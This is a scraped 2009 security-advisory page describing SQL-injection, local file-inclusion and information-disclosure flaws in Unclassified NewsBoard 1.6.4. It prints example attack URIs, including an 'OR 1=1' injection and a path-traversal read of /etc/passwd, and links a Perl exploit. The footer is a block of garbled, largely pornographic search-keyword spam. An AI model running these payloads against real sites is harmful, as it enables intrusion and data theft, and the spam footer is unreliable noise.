about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Unclassified NewsBoard Multiple Remote Vulnerabilities


Title Unclassified NewsBoard Multiple Remote Vulnerabilities
Published 2009-06-02-12:00AM
Updated 2009-06-03-02:19PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  __GiReX__
Vulnerable  Unclassified NewsBoard Unclassified NewsBoard 1.6.4
Not Vulnerable  
Code  An attacker can exploit these issues through a browser.The following example URIs are available:For the SQL-injection issue:
http://www.example.com/forum.php?req=search&Query=xxx'))OR/**/1=1%23&ResultView=2&InMessage=1&Sort=2&Forum=0For the local file-include issue:
http://www.example.com/forum.php?GLOBALS[UTE][__tplCollection][a][file]=../../../../../../../../../../../../etc/passwd%00 For the information-disclosure issues:
http://www.example.com/forum.php?req=rss&type=3&forum=1&GLOBALS[filename]=../logs/board-yyyy-mm-dd.log
http://www.example.com/extra/import/import_wbb1.phpThe following exploit for the SQL-injection issue is available:
  • /data/vulnerabilities/exploits/35183.pl
  • TXT  t3xt 1t!


    Advertising

    Copyright 2007, SecurityDot
    Sat, 21 Nov 2009 22:41:51 +0000

    Friends : milw0rm.com , secunia.com , securityfocus.com
    GOOGLE
    NEWS EXPLOITS VULNS
    exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
    www.longwe osdate WWW.SEX.MO xxx2000 www.pornpi www.fantas SEX X Www.slit.c hts hen tai mambo Remo Mujerdesnu phpbb+post andrasex WWW.SEX.MO mc tica www.cannes Sxe jeral a l 4l www-sex wo www.wunbuc coded by j modules_ nude actre iiqeqexife cross site Www.celebr Naruto sex Vidiosex Cross-Site ip%20board www.2008sf cumvolcano www.2008sf Vidiosex java lotus PORN GALER chainasex. 97ses.info 2.6.18.3 egyptsex lezzo Video see CHUDAI MOV http:/www. DADS/Recor malayalamm Bollydoods CMS is Fre age 18sex